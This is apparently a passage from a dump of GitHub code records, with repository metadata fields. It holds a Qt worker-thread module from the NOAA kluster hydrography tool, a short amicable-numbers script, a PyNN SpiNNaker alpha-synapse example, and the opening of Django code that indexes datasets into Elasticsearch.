HSTB.kluster import kluster_variables\nfrom HSTB.kluster.fqpr_convenience import generate_new_surface, import_processed_navigation, overwrite_raw_navigation, \\\n update_surface, reload_data, reload_surface, points_to_surface, generate_new_mosaic\n\n\nclass MyWorker(QtCore.QThread):\n\n tstarted = Signal(bool)\n tfinished = Signal(bool)\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.error = False\n self.action_type = None\n self.errortxt = ''\n self.exceptiontxt = None\n\n def reset(self):\n self.error = False\n self.errortxt = ''\n self.exceptiontxt = None\n\n def log_exception(self, e: Exception):\n self.error = True\n self.errortxt = str(e)\n self.exceptiontxt = traceback.format_exc()\n\n def show_error(self):\n if self.errortxt:\n msgbox = QtWidgets.QMessageBox()\n msgbox.setText(f'ERROR: {self.action_type}')\n msgbox.setInformativeText(self.errortxt)\n msgbox.setDetailedText(self.exceptiontxt)\n msgbox.exec_()\n\n\nclass ActionWorker(MyWorker):\n \"\"\"\n Executes code in a separate thread.\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.action_container = None\n self.action_index = None\n self.result = None\n\n def populate(self, action_container, action_index):\n super().reset()\n self.action_container = action_container\n self.action_index = action_index\n self.result = None\n\n def run(self):\n self.tstarted.emit(True)\n try:\n action = self.action_container.actions[self.action_index]\n self.parent().debug_print(f'current action container')\n self.parent().debug_print(f'running {action}: {action.function}, kwargs={action.kwargs}', logging.INFO)\n self.action_type = action.action_type\n self.result = self.action_container.execute_action(self.action_index)\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass OpenProjectWorker(MyWorker):\n \"\"\"\n Thread that runs when the user drags in a new project file or opens a project using the menu\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.new_project_path = None\n self.force_add_fqprs = None\n self.force_add_surfaces = None\n self.new_fqprs = []\n self.new_surfaces = []\n\n def populate(self, new_project_path=None, force_add_fqprs=None, force_add_surfaces=None):\n super().reset()\n self.new_project_path = new_project_path\n self.force_add_fqprs = force_add_fqprs\n self.force_add_surfaces = force_add_surfaces\n self.new_fqprs = []\n self.new_surfaces = []\n\n def run(self):\n self.tstarted.emit(True)\n try:\n self.action_type = 'Open Project'\n self.new_fqprs = []\n if self.new_project_path:\n data = return_project_data(self.new_project_path)\n else:\n data = {'fqpr_paths': [], 'surface_paths': []}\n if self.force_add_fqprs:\n data['fqpr_paths'] = self.force_add_fqprs\n if self.force_add_surfaces:\n data['surface_paths'] = self.force_add_surfaces\n self.parent().debug_print(f'loading {data}', logging.INFO)\n for pth in data['fqpr_paths']:\n fqpr_entry = reload_data(pth, skip_dask=True, silent=True, show_progress=True)\n if fqpr_entry is not None: # fqpr instance successfully loaded\n self.new_fqprs.append(fqpr_entry)\n else:\n self.parent().print('Unable to load converted data from {}'.format(pth), logging.WARNING)\n for pth in data['surface_paths']:\n surf_entry = reload_surface(pth)\n if surf_entry is not None: # grid instance successfully loaded\n self.new_surfaces.append(surf_entry)\n else:\n self.parent().print('Unable to load surface from {}'.format(pth), logging.WARNING)\n except Exception as e:\n 
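# log_exception stores the error text and traceback; show_error later surfaces them in a QMessageBox\n 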
super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass DrawNavigationWorker(MyWorker):\n \"\"\"\n On opening a project, you have to get the navigation for each line and draw it in the 2d view\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.project = None\n self.new_fqprs = None\n self.line_data = {}\n\n def populate(self, project, new_fqprs):\n super().reset()\n self.project = project\n self.new_fqprs = new_fqprs\n self.line_data = {}\n\n def run(self):\n self.tstarted.emit(True)\n try:\n self.action_type = 'Draw Lines'\n for fq in self.new_fqprs:\n self.parent().print('building tracklines for {}...'.format(fq), logging.INFO)\n for ln in self.project.return_project_lines(proj=fq, relative_path=True):\n lats, lons = self.project.return_line_navigation(ln)\n if lats is not None:\n self.line_data[ln] = [lats, lons]\n self.parent().debug_print(f'project.return_line_navigation: drawing {ln}: {len(lats)} points, {lats[0]},{lons[0]} to {lats[-1]},{lons[-1]}', logging.INFO)\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass DrawSurfaceWorker(MyWorker):\n \"\"\"\n On opening a new surface, you have to get the surface tiles to display as in memory geotiffs in kluster_main\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.surface_path = None\n self.surf_object = None\n self.resolution = None\n self.surface_layer_name = None\n self.surface_data = {}\n\n def populate(self, surface_path, surf_object, resolution, surface_layer_name):\n super().reset()\n self.surface_path = surface_path\n self.surf_object = surf_object\n self.resolution = resolution\n # handle optional hillshade layer\n self.surface_layer_name = surface_layer_name\n self.surface_data = {}\n\n def run(self):\n self.tstarted.emit(True)\n try:\n self.action_type = 'Draw Surface'\n if self.surface_layer_name == 'tiles':\n try:\n x, y = self.surf_object.get_tile_boundaries()\n self.parent().debug_print(f'surf_object.get_tile_boundaries: getting bathygrid tile boundaries, {len(x)} points from {x[0]},{y[0]} to {x[-1]},{y[-1]}', logging.INFO)\n self.surface_data = [x, y]\n except:\n self.parent().print('Unable to load tile layer from {}, no surface data found'.format(self.surface_path), logging.WARNING)\n self.surface_data = {}\n else:\n if self.surface_layer_name == 'hillshade':\n surface_layer_name = 'depth'\n else:\n surface_layer_name = self.surface_layer_name\n for resolution in self.resolution:\n self.surface_data[resolution] = {}\n chunk_count = 1\n for geo_transform, maxdim, data in self.surf_object.get_chunks_of_tiles(resolution=resolution, layer=surface_layer_name,\n override_maximum_chunk_dimension=kluster_variables.chunk_size_display,\n nodatavalue=np.float32(np.nan), z_positive_up=self.surf_object.positive_up,\n for_gdal=True):\n data = list(data.values())\n tilename = self.surface_layer_name + '_{}'.format(chunk_count)\n self.surface_data[resolution][tilename] = [data, geo_transform]\n chunk_count += 1\n self.parent().debug_print(f'surf_object.get_chunks_of_tiles: {self.surface_path} : {tilename} : {resolution}m geotransform {geo_transform} maxdimension {maxdim}', logging.INFO)\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass LoadPointsWorker(MyWorker):\n \"\"\"\n Executes code in a separate thread.\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.polygon = None\n self.azimuth = None\n self.project = None\n self.points_data = None\n\n def 
populate(self, polygon=None, azimuth=None, project=None):\n super().reset()\n self.polygon = polygon\n self.azimuth = azimuth\n self.project = project\n self.points_data = None\n\n def run(self):\n self.tstarted.emit(True)\n self.action_type = 'Load Points'\n try:\n self.parent().debug_print(f'project.return_soundings_in_polygon: Returning soundings within polygon {self.polygon}', logging.INFO)\n self.points_data = self.project.return_soundings_in_polygon(self.polygon)\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass ImportNavigationWorker(MyWorker):\n \"\"\"\n Executes code in a separate thread.\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.fq_chunks = None\n self.fqpr_instances = []\n\n def populate(self, fq_chunks):\n super().reset()\n self.fq_chunks = fq_chunks\n self.fqpr_instances = []\n\n def run(self):\n self.tstarted.emit(True)\n self.action_type = 'Import Navigation'\n try:\n for chnk in self.fq_chunks:\n self.parent().debug_print(f'fqpr_convenience.import_processed_navigation {chnk[1]}', logging.INFO)\n self.fqpr_instances.append(import_processed_navigation(chnk[0], **chnk[1]))\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass OverwriteNavigationWorker(MyWorker):\n \"\"\"\n Executes code in a separate thread.\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.fq_chunks = None\n self.fqpr_instances = []\n\n def populate(self, fq_chunks):\n super().reset()\n self.fq_chunks = fq_chunks\n self.fqpr_instances = []\n\n def run(self):\n self.tstarted.emit(True)\n self.action_type = 'Overwrite Navigation'\n try:\n for chnk in self.fq_chunks:\n self.parent().debug_print(f'fqpr_convenience.overwrite_raw_navigation {chnk[1]}', logging.INFO)\n self.fqpr_instances.append(overwrite_raw_navigation(chnk[0], **chnk[1]))\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass ExportWorker(MyWorker):\n \"\"\"\n Executes code in a separate thread.\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.fq_chunks = None\n self.line_names = None\n self.datablock = []\n self.fqpr_instances = []\n self.export_type = ''\n self.mode = ''\n self.z_pos_down = False\n self.delimiter = ' '\n self.formattype = 'xyz'\n self.filterset = False\n self.separateset = False\n\n def populate(self, fq_chunks, line_names, datablock, export_type, z_pos_down, delimiter, formattype, filterset,\n separateset, basic_mode, line_mode, points_mode):\n super().reset()\n if basic_mode:\n self.mode = 'basic'\n elif line_mode:\n self.mode = 'line'\n elif points_mode:\n self.mode = 'points'\n\n self.fqpr_instances = []\n self.line_names = line_names\n self.datablock = datablock\n self.fq_chunks = fq_chunks\n self.export_type = export_type\n self.z_pos_down = z_pos_down\n if delimiter == 'comma':\n self.delimiter = ','\n elif delimiter == 'space':\n self.delimiter = ' '\n else:\n raise ValueError('ExportWorker: Expected either \"comma\" or \"space\", received {}'.format(delimiter))\n self.formattype = formattype\n self.filterset = filterset\n self.separateset = separateset\n\n def export_process(self, fq, datablock=None):\n if self.mode == 'basic':\n self.parent().debug_print(f'export_pings_to_file file_format={self.export_type}, csv_delimiter={self.delimiter}, filter_by_detection={self.filterset}, format_type={self.formattype}, z_pos_down={self.z_pos_down}, export_by_identifiers={self.separateset}', logging.INFO)\n 
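# forward the export options captured in populate() to the Fqpr export routine\n 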
fq.export_pings_to_file(file_format=self.export_type, csv_delimiter=self.delimiter, filter_by_detection=self.filterset,\n format_type=self.formattype, z_pos_down=self.z_pos_down, export_by_identifiers=self.separateset)\n elif self.mode == 'line':\n self.parent().debug_print(f'export_lines_to_file linenames={self.line_names}, file_format={self.export_type}, csv_delimiter={self.delimiter}, filter_by_detection={self.filterset}, format_type={self.formattype}, z_pos_down={self.z_pos_down}, export_by_identifiers={self.separateset}', logging.INFO)\n fq.export_lines_to_file(linenames=self.line_names, file_format=self.export_type, csv_delimiter=self.delimiter,\n filter_by_detection=self.filterset, format_type=self.formattype, z_pos_down=self.z_pos_down, export_by_identifiers=self.separateset)\n else:\n self.parent().debug_print(f'export_soundings_to_file file_format={self.export_type}, csv_delimiter={self.delimiter}, filter_by_detection={self.filterset}, format_type={self.formattype}, z_pos_down={self.z_pos_down}', logging.INFO)\n fq.export_soundings_to_file(datablock=datablock, file_format=self.export_type, csv_delimiter=self.delimiter,\n filter_by_detection=self.filterset, format_type=self.formattype, z_pos_down=self.z_pos_down)\n return fq\n\n def run(self):\n self.tstarted.emit(True)\n self.action_type = f'Export Dataset ({self.mode})'\n try:\n if self.mode in ['basic', 'line']:\n for chnk in self.fq_chunks:\n self.fqpr_instances.append(self.export_process(chnk[0]))\n else:\n fq = self.fq_chunks[0][0]\n self.fqpr_instances.append(self.export_process(fq, datablock=self.datablock))\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass FilterWorker(MyWorker):\n \"\"\"\n Executes code in a separate thread.\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.fq_chunks = None\n self.line_names = None\n self.fqpr_instances = []\n self.new_status = []\n self.mode = ''\n self.selected_index = None\n self.filter_name = ''\n self.save_to_disk = True\n\n self.kwargs = None\n self.selected_index = []\n\n def populate(self, fq_chunks, line_names, filter_name, basic_mode, line_mode, points_mode, save_to_disk, kwargs):\n super().reset()\n if basic_mode:\n self.mode = 'basic'\n elif line_mode:\n self.mode = 'line'\n elif points_mode:\n self.mode = 'points'\n\n self.fqpr_instances = []\n self.new_status = []\n self.line_names = line_names\n self.fq_chunks = fq_chunks\n self.filter_name = filter_name\n self.save_to_disk = save_to_disk\n\n self.kwargs = kwargs\n if self.kwargs is None:\n self.kwargs = {}\n self.selected_index = []\n\n def filter_process(self, fq, subset_time=None, subset_beam=None):\n if self.mode == 'basic':\n self.parent().debug_print(f'run_filter {self.filter_name}, {self.kwargs}', logging.INFO)\n new_status = fq.run_filter(self.filter_name, **self.kwargs)\n fq.multibeam.reload_pingrecords()\n elif self.mode == 'line':\n self.parent().debug_print(f'run_filter {self.filter_name}, {self.kwargs}', logging.INFO)\n fq.subset_by_lines(self.line_names)\n new_status = fq.run_filter(self.filter_name, **self.kwargs)\n fq.restore_subset()\n fq.multibeam.reload_pingrecords()\n else:\n self.parent().debug_print(f'take the provided Points View time and subset the provided fqpr to just those times,beams', logging.INFO)\n selected_index = fq.subset_by_time_and_beam(subset_time, subset_beam)\n self.parent().debug_print(f'run_filter {self.filter_name}, {self.kwargs}', logging.INFO)\n new_status = fq.run_filter(self.filter_name, 
selected_index=selected_index, save_to_disk=self.save_to_disk, **self.kwargs)\n fq.restore_subset()\n if self.save_to_disk:\n fq.multibeam.reload_pingrecords()\n self.selected_index.append(selected_index)\n return fq, new_status\n\n def run(self):\n self.tstarted.emit(True)\n self.action_type = f'Filter {self.filter_name} ({self.mode})'\n try:\n if self.mode in ['basic', 'line']:\n for chnk in self.fq_chunks:\n fq, new_status = self.filter_process(chnk[0])\n self.fqpr_instances.append(fq)\n self.new_status.append(new_status)\n else:\n for chnk in self.fq_chunks:\n fq, subset_time, subset_beam = chnk[0], chnk[1], chnk[2]\n fq, new_status = self.filter_process(fq, subset_time, subset_beam)\n self.fqpr_instances.append(fq)\n self.new_status.append(new_status)\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass ExportTracklinesWorker(MyWorker):\n \"\"\"\n Executes code in a separate thread.\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.fq_chunks = None\n self.line_names = None\n self.fqpr_instances = []\n self.export_type = ''\n self.mode = ''\n self.output_path = ''\n\n def populate(self, fq_chunks, line_names, export_type, basic_mode, line_mode, output_path):\n super().reset()\n if basic_mode:\n self.mode = 'basic'\n elif line_mode:\n self.mode = 'line'\n\n self.fqpr_instances = []\n self.line_names = line_names\n self.fq_chunks = fq_chunks\n self.export_type = export_type\n self.output_path = output_path\n\n def export_process(self, fq):\n if self.mode == 'basic':\n self.parent().debug_print(f'export_tracklines_to_file output_file={self.output_path}, file_format={self.export_type}', logging.INFO)\n fq.export_tracklines_to_file(linenames=None, output_file=self.output_path, file_format=self.export_type)\n elif self.mode == 'line':\n self.parent().debug_print(f'export_tracklines_to_file linenames={self.line_names} output_file={self.output_path}, file_format={self.export_type}', logging.INFO)\n fq.export_tracklines_to_file(linenames=self.line_names, output_file=self.output_path, file_format=self.export_type)\n return fq\n\n def run(self):\n self.tstarted.emit(True)\n self.action_type = f'Export Tracklines ({self.mode})'\n try:\n for chnk in self.fq_chunks:\n self.fqpr_instances.append(self.export_process(chnk[0]))\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass ExportGridWorker(MyWorker):\n \"\"\"\n Executes code in a separate thread.\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.surf_instance = None\n self.export_type = ''\n self.output_path = ''\n self.z_pos_up = True\n self.bag_kwargs = {}\n\n def populate(self, surf_instance, export_type, output_path, z_pos_up, bag_kwargs):\n super().reset()\n self.surf_instance = surf_instance\n self.export_type = export_type\n self.output_path = output_path\n self.bag_kwargs = bag_kwargs\n self.z_pos_up = z_pos_up\n\n def run(self):\n self.tstarted.emit(True)\n self.action_type = f'Export Grid'\n try:\n self.parent().debug_print(f'surf_instance.export {self.output_path} export_type={self.export_type}, z_pos_up={self.z_pos_up}', logging.INFO)\n # None in the 4th arg to indicate you want to export all resolutions\n self.surf_instance.export(self.output_path, self.export_type, self.z_pos_up, None,\n override_maximum_chunk_dimension=kluster_variables.chunk_size_export,\n **self.bag_kwargs)\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass SurfaceWorker(MyWorker):\n 
\"\"\"\n Executes code in a seperate thread.\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.fqpr_instances = None\n self.fqpr_surface = None\n self.opts = {}\n self.mode = 'from_fqpr'\n\n def populate(self, fqpr_instances, opts):\n super().reset()\n self.fqpr_instances = fqpr_instances\n self.fqpr_surface = None\n self.opts = opts\n self.mode = 'from_fqpr'\n\n def run(self):\n self.tstarted.emit(True)\n self.action_type = f'New Surface'\n try:\n if self.mode == 'from_fqpr':\n self.parent().debug_print(f'generate_new_surface {self.opts}', logging.INFO)\n self.fqpr_surface = generate_new_surface(self.fqpr_instances, **self.opts)\n elif self.mode == 'from_points':\n self.parent().debug_print(f'points_to_surface {self.opts}', logging.INFO)\n self.fqpr_surface = points_to_surface(self.fqpr_instances, **self.opts)\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass MosaicWorker(MyWorker):\n \"\"\"\n Executes code in a seperate thread.\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.fqpr_instances = None\n self.fqpr_surface = None\n self.opts = {}\n\n def populate(self, fqpr_instances, opts):\n super().reset()\n self.fqpr_instances = fqpr_instances\n self.fqpr_surface = None\n self.opts = opts\n\n def run(self):\n self.tstarted.emit(True)\n self.action_type = f'New Mosaic'\n try:\n self.parent().debug_print(f'generate_new_mosaic {self.opts}', logging.INFO)\n self.fqpr_surface = generate_new_mosaic(self.fqpr_instances, **self.opts)\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass SurfaceUpdateWorker(MyWorker):\n \"\"\"\n Executes code in a seperate thread.\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.fqpr_surface = None\n self.add_fqpr_instances = None\n self.add_lines = None\n self.remove_fqpr_names = None\n self.remove_lines = None\n self.opts = {}\n self.all_resolutions = None\n\n def populate(self, fqpr_surface, add_fqpr_instances, add_lines, remove_fqpr_names, remove_lines, opts, all_resolutions):\n super().reset()\n self.fqpr_surface = fqpr_surface\n self.add_fqpr_instances = add_fqpr_instances\n self.add_lines = add_lines\n self.remove_fqpr_names = remove_fqpr_names\n self.remove_lines = remove_lines\n self.all_resolutions = all_resolutions\n self.opts = opts\n\n def run(self):\n self.tstarted.emit(True)\n self.action_type = f'Update Surface'\n try:\n self.parent().debug_print(f'update_surface add_fqpr={self.add_fqpr_instances}, add_lines={self.add_lines}, remove_fqpr={self.remove_fqpr_names}, remove_lines={self.remove_lines}, {self.opts}', logging.INFO)\n self.fqpr_surface, oldrez, newrez = update_surface(self.fqpr_surface, self.add_fqpr_instances, self.add_lines,\n self.remove_fqpr_names, self.remove_lines, **self.opts)\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass PatchTestUpdateWorker(MyWorker):\n \"\"\"\n Executes code in a seperate thread.\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.fqprs = None\n self.newvalues = []\n self.headindex = None\n self.prefixes = None\n self.timestamps = None\n self.serial_number = None\n self.polygon = None\n self.vdatum_directory = None\n\n self.result = []\n\n def populate(self, fqprs=None, newvalues=None, headindex=None, prefixes=None, timestamps=None, serial_number=None,\n polygon=None, vdatum_directory=None):\n super().reset()\n self.fqprs = fqprs\n self.newvalues = newvalues\n self.headindex 
= headindex\n self.prefixes = prefixes\n self.timestamps = timestamps\n self.serial_number = serial_number\n self.polygon = polygon\n self.vdatum_directory = vdatum_directory\n\n self.result = []\n\n def run(self):\n self.tstarted.emit(True)\n self.action_type = f'Patch Test'\n try:\n self.parent().debug_print(f'reprocess_fqprs fqprs={self.fqprs}, newvalues={self.newvalues}, headindex={self.headindex}, prefixes={self.prefixes}, timestamps={self.timestamps}, serial_number={self.serial_number}, polygon={self.polygon}, vdatum_directory={self.vdatum_directory}', logging.INFO)\n self.fqprs, self.result = reprocess_fqprs(self.fqprs, self.newvalues, self.headindex, self.prefixes, self.timestamps,\n self.serial_number, self.polygon, self.vdatum_directory)\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n","repo_name":"noaa-ocs-hydrography/kluster","sub_path":"HSTB/kluster/gui/kluster_worker.py","file_name":"kluster_worker.py","file_ext":"py","file_size_in_byte":26668,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"3"} +{"seq_id":"14693396741","text":"def aliquot(x):\n l=[]\n for i in range(1,x):\n if x%i==0:\n l.append(i)\n k=sum(l)\n return k\n \n# Check whether a pair of numbers is amicable or not\n\nnum1=int(input(\"Enter the first No:\"))\nnum2=int(input(\"Enter the second No:\"))\nif aliquot(num1)==num2 and aliquot(num2)==num1:\n print(\"Amicable Numbers\")\nelse:\n print(\"Not amicable numbers\")\n","repo_name":"raichalvarghese/Python","sub_path":"amicable.py","file_name":"amicable.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15230011233","text":"import pyNN.spiNNaker as p\nimport matplotlib.pyplot as plt\nimport pyNN.utility.plotting as plot\n\np.setup(0.1)\nruntime = 50\npopulations = []\ntitle = \"PyNN0.8 alpha synapse testing\"\n\npop_src1 = p.Population(1, p.SpikeSourceArray,\n {'spike_times': [[5, 15, 20, 30]]}, label=\"src1\")\n\npopulations.append(p.Population(1, p.IF_curr_alpha, {}, label=\"test\"))\n\npopulations[0].set(tau_syn_E=2)\npopulations[0].set(tau_syn_I=4)\n\n# define the projections\nexc_proj = p.Projection(pop_src1, populations[0],\n p.OneToOneConnector(),\n p.StaticSynapse(weight=1, delay=1),\n receptor_type=\"excitatory\")\ninh_proj = p.Projection(pop_src1, populations[0],\n p.OneToOneConnector(),\n p.StaticSynapse(weight=1, delay=10),\n receptor_type=\"inhibitory\")\n\npopulations[0].record(\"all\")\np.run(runtime)\n\nv = populations[0].get_data(\"v\")\ngsyn_exc = populations[0].get_data(\"gsyn_exc\")\ngsyn_inh = populations[0].get_data(\"gsyn_inh\")\nspikes = populations[0].get_data(\"spikes\")\n\nplot.Figure(\n plot.Panel(v.segments[0].filter(name='v')[0],\n ylabel=\"Membrane potential (mV)\",\n data_labels=[populations[0].label],\n yticks=True, xlim=(0, runtime)),\n plot.Panel(gsyn_exc.segments[0].filter(name='gsyn_exc')[0],\n ylabel=\"gsyn excitatory (mV)\",\n data_labels=[populations[0].label],\n yticks=True, xlim=(0, runtime)),\n plot.Panel(gsyn_inh.segments[0].filter(name='gsyn_inh')[0],\n ylabel=\"gsyn inhibitory (mV)\",\n data_labels=[populations[0].label],\n yticks=True, xlim=(0, runtime)),\n title=title,\n annotations=\"Simulated with 
{}\".format(p.name())\n)\nplt.show()\np.end()\n","repo_name":"SpiNNakerManchester/PyNN8Examples","sub_path":"examples/if_curr_alpha.py","file_name":"if_curr_alpha.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"3"} +{"seq_id":"5118441106","text":"import json\n\nfrom django.conf import settings\nfrom django.db.models import Q\nfrom django.http import HttpResponse, JsonResponse\nfrom elasticsearch import Elasticsearch\n\nfrom .models import (\n Catalog,\n Organization,\n OrganizationCreateRequest,\n Resource,\n FileDetails,\n APIDetails,\n Dataset,\n DatasetAccessModel,\n DatasetAccessModelRequest,\n)\nfrom .utils import dataset_slug, get_average_rating\nfrom .enums import DataType\n\n# from django.utils.datastructures import MultiValueDictKeyError\n\nes_client = Elasticsearch(settings.ELASTICSEARCH)\n\n\n# TODO: New flow for rating, only update will be there.\ndef index_data(dataset_obj):\n if not dataset_obj.status == \"PUBLISHED\":\n return\n doc = {\n \"dataset_title\": dataset_obj.title,\n \"dataset_description\": dataset_obj.description,\n \"action\": dataset_obj.action,\n \"funnel\": dataset_obj.funnel,\n \"issued\": dataset_obj.issued,\n \"period_from\": dataset_obj.period_from,\n \"period_to\": dataset_obj.period_to,\n \"update_frequency\": dataset_obj.update_frequency,\n \"dataset_type\": dataset_obj.dataset_type,\n \"remote_issued\": dataset_obj.remote_issued,\n \"remote_modified\": dataset_obj.remote_modified,\n \"published_date\": dataset_obj.published_date,\n \"last_updated\": dataset_obj.last_updated,\n \"modified\": dataset_obj.modified,\n \"slug\": dataset_slug(dataset_obj.id),\n \"highlights\": dataset_obj.highlights or [],\n \"download_count\": dataset_obj.download_count,\n \"average_rating\": get_average_rating(dataset_obj),\n \"hvd_rating\": dataset_obj.hvd_rating,\n \"resource_count\": Resource.objects.filter(dataset=dataset_obj).count(),\n \"dynamic_date\": dataset_obj.is_datedynamic\n }\n\n geography = dataset_obj.geography.all()\n sector = dataset_obj.sector.all()\n tags = dataset_obj.tags.all()\n dataset_geography = []\n dataset_sector = []\n dataset_tag = []\n for geo in geography:\n dataset_geography.append(geo.name)\n for sec in sector:\n dataset_sector.append(sec.name)\n for tag in tags:\n dataset_tag.append(tag.name)\n doc[\"geography\"] = dataset_geography\n doc[\"sector\"] = dataset_sector\n doc[\"tags\"] = dataset_tag\n\n catalog_instance = Catalog.objects.get(id=dataset_obj.catalog_id)\n doc[\"catalog_title\"] = catalog_instance.title\n doc[\"catalog_description\"] = catalog_instance.description\n\n org_instance = Organization.objects.get(id=catalog_instance.organization_id)\n doc[\"org_title\"] = org_instance.title\n doc[\"org_description\"] = org_instance.description\n doc[\"org_types\"] = org_instance.organization_types\n doc[\"org_id\"] = catalog_instance.organization_id\n doc[\"org_logo\"] = str(org_instance.logo) if org_instance.logo else \"\"\n update_organization_index(\n OrganizationCreateRequest.objects.get(organization_ptr_id=org_instance.id)\n )\n resource_instance = Resource.objects.filter(dataset_id=dataset_obj.id)\n resource_title = []\n resource_description = []\n auth_required = []\n auth_type = []\n format = []\n for resources in resource_instance:\n resource_title.append(resources.title)\n resource_description.append(resources.description)\n # Checks based on datasets_type.\n if dataset_obj.dataset_type == DataType.API.value:\n try:\n 
api_details_obj = APIDetails.objects.get(resource_id=resources.id)\n auth_required.append(api_details_obj.auth_required)\n auth_type.append(api_details_obj.api_source.auth_type)\n format.append(api_details_obj.response_type)\n except APIDetails.DoesNotExist as e:\n pass\n elif dataset_obj.dataset_type == DataType.FILE.value:\n try:\n file_details_obj = FileDetails.objects.get(resource_id=resources.id)\n format.append(file_details_obj.format)\n except FileDetails.DoesNotExist as e:\n pass\n else:\n format.append(\"EXTERNAL LINK\")\n # Index all resources of a dataset.\n doc[\"resource_title\"] = resource_title\n doc[\"resource_description\"] = resource_description\n # if auth_required:\n # doc[\"auth_required\"] = auth_required\n # if auth_type:\n # doc[\"auth_type\"] = auth_type\n # if format:\n # doc[\"format\"] = format\n\n # Index Data Access Model.\n # dam_instances = DatasetAccessModel.objects.filter(dataset=dataset_obj)\n # data_access_model_ids = []\n # data_access_model_titles = []\n # data_access_model_types = []\n # dataset_access_models = []\n # license = []\n # for dam in dam_instances:\n # data_access_model_ids.append(dam.data_access_model.id)\n # data_access_model_titles.append(dam.data_access_model.title)\n # data_access_model_types.append(dam.data_access_model.type)\n # license.append(dam.data_access_model.license.title)\n # dataset_access_models.append(\n # {\n # \"id\": dam.id,\n # \"type\": dam.data_access_model.type,\n # \"payment_type\": dam.payment_type,\n # \"payment\": dam.payment,\n # }\n # )\n # doc[\"dataset_access_models\"] = dataset_access_models\n # doc[\"data_access_model_id\"] = data_access_model_ids\n # doc[\"data_access_model_title\"] = data_access_model_titles\n # doc[\"data_access_model_type\"] = data_access_model_types\n # doc[\"license\"] = license\n\n # Check if Dataset already exists.\n resp = es_client.exists(index=\"dataset\", id=dataset_obj.id)\n if resp:\n # Delete the Dataset.\n resp = es_client.delete(index=\"dataset\", id=dataset_obj.id)\n # print(resp[\"result\"])\n # Index the Dataset.\n resp = es_client.index(index=\"dataset\", id=dataset_obj.id, document=doc)\n update_organization_index(\n OrganizationCreateRequest.objects.get(organization_ptr_id=org_instance.id)\n )\n # print(resp[\"result\"])\n return resp[\"result\"]\n\n\n# def get_doc(doc_id):\n# resp = es_client.get(index=\"dataset\", id=doc_id)\n# #print(resp)\n# print(resp['_source'])\n\n\ndef delete_data(id):\n resp = es_client.delete(index=\"dataset\", id=id)\n print(resp[\"result\"])\n\n\ndef facets(request):\n filters = [] # List of queries for elasticsearch to filter up on.\n selected_facets = [] # List of facets that are selected.\n facet = [\n \"license\",\n \"geography\",\n \"format\",\n # \"status\",\n # \"rating\",\n \"sector\",\n # \"org_types\",\n ]\n # dam_type = request.GET.get(\"type\")\n # payment_type = request.GET.get(\"payment_type\")\n size = request.GET.get(\"size\")\n if not size:\n size = 5\n paginate_from = request.GET.get(\"from\", 0)\n query_string = request.GET.get(\"q\")\n sort_by = request.GET.get(\"sort_by\", None)\n sort_order = request.GET.get(\"sort\", \"\")\n if sort_order == \"\":\n sort_order = \"desc\"\n org = request.GET.get(\"organization\", None)\n start_duration = request.GET.get(\"start_duration\", None)\n end_duration = request.GET.get(\"end_duration\", None)\n # print(sort_by, sort_order)\n if sort_by and sort_order:\n if sort_by == \"modified\":\n sort_mapping = {\"modified\": {\"order\": sort_order}}\n # elif sort_by == \"rating\":\n # 
